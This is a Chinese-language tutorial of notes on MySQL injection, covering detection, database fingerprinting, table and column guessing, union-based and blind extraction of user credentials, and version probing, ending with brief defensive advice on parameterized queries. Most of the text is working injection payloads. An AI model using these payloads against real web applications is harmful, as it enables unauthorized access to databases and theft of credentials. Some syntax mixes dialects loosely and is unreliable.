MySQL注入攻击技术详解

"MySQL注入笔记" MySQL注入是一种网络安全漏洞，攻击者通过在Web应用程序的输入框中插入SQL语句，利用程序未对用户输入进行有效过滤的缺陷，来操控数据库。以下是一些关于MySQL注入的关键知识点： 1. **注入检测**： - 通过在用户名或密码字段中加入特定条件来测试是否存在注入漏洞。例如，`admin' and 1=1` 和 `admin' and 1=2`。如果前者返回正常结果，而后者返回错误，这通常意味着存在SQL注入。 2. **数据库系统识别**： - 判断是MySQL、MS SQL还是Access，可以利用系统特有的表进行查询。例如，`and (select count(*) from sysobjects)>0` 检测MS SQL，而 `and (select count(*) from msysobjects)>0` 检测Access。如果能正常执行，就可能确认所使用的数据库类型。 3. **猜表名和字段**： - 使用 `exists(select * from [表名])` 来检查表是否存在。 - 利用 `admin' and (select Count(*) from [表名])>0 and 1='1` 来确认表中是否存在数据。 - `id=1 union all select 1,2,3 from [表名]` 可用于显示表中的数据。 - 猜测字段名可以采用 `exists(select [l列名] from [表名])` 和 `admin' and (select Count(字段名) from 数据库名)>0 and 1='1`。 4. **内容拆解与字段长度**： - 通过 `substring` 函数和 `concat` 函数结合，可以获取并解析数据库中的内容，如 `id=1 and ascii(substring((select concat(0x3a,usr,pwd) from user_t limit 0,1),1,1))>=97`。 - 猜测字段长度，对于MySQL，可以通过逐位比较ASCII值来实现，如 `admin' and (select top 1 len(字段名) from [表名])>0 and 1='1`。注意，MySQL不支持 `top 1`，但可以使用 `limit` 替换。 5. **字段值的ASCII值猜测**： - 对于Access，可以使用 `and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0`。 - 对于MS SQL，可以使用 `and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0`。 6. **获取数据库版本**： - 利用 `admin' and (select @@version) > 5.4 and 1='1` 判断MySQL版本是否大于5.4，或者直接使用 `union select version` 查询版本信息。 这些技巧展示了攻击者如何利用MySQL注入来获取敏感信息，因此，对开发者而言，确保对用户输入进行充分的验证和转义是防止此类攻击的关键。在开发过程中应遵循安全编码原则，使用预编译的SQL语句（如参数化查询）以及限制数据库用户的最小权限，可以极大地提高系统的安全性。